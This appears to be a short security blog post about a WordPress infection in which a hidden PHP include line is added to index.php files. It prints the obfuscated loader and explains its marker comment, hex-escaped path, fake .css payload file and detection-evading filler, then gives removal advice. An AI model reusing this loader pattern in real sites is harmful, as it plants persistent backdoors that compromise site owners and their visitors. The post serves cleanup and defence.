Here is what to do if your wordpress site has an include statement in index.php that loads and executes malware.

Tampering that loads malware is in index.php

The malware modifies and embeds the following code in the original index.php in various folders on the WordPress site or, if there is no index.php in the folder, after generating it.

?php
/*9c46d*/

$rhz7 = "/var/www/*******/wp\x2dincludes/p\x68p\x2dcompat/.a8f26ae0.css"; if ($rhz7 . '67'){ @include_once /* 44 */ ($rhz7); }

/*9c46d*/

Analyze malware code

The /*9c46d*/ part is an identifier to determine if other malware (e.g., resident in the server process) has removed the tampering.
If the tampering has been removed, it is possible that other malware that automatically reinfects the server may still be present.

In the $rhz7 = “/var/www/*******/.a8f26ae0.css” section, the body of the malware (which causes malicious behavior such as redirecting the site) is assigned to the variable.
In this case, the malware is disguised as a .css stylesheet.

/wp\x2dincludes/p\x68p\x2dcompat/.a8f26ae0.css

is obfuscated, but when unobfuscated

/wp-includes/php-compat/.a8f26ae0.css

which indicates that the malware itself is in the /wp-includes/php-compat/ folder.

if ($rhz7 . ’67’){ is always positive. This is a meaningless piece of code that prevents it from being caught by the detection.
The same goes for the /* 44 */ comment.

@include_once ($rhz7); You can see that every time index.php is executed, the malware body is loaded and executed with an include_once statement.

How to deal with include statements that load and execute malware

If you remove the code between the malware identifier /*9c46d*/, the malware that is executed every time index.php is accessed will no longer be loaded and executed. However, if the re-modification continues, it is highly likely that there is another reinfecting malware somewhere on the server.
(There may be a process on the server that continues to run malware in an infinite loop.)

If the malware cannot be removed as soon as possible, the search engine may judge the site as a malware-infected site and lower its search ranking, or it may register incorrect search results, or the legitimate page may be sent to another site.

We also recommend that you use plug-ins to perform a comprehensive inspection and removal of malware.
Free WordPress:Malware Scan & Security Plug-in [Malware and Virus Detection and Removal].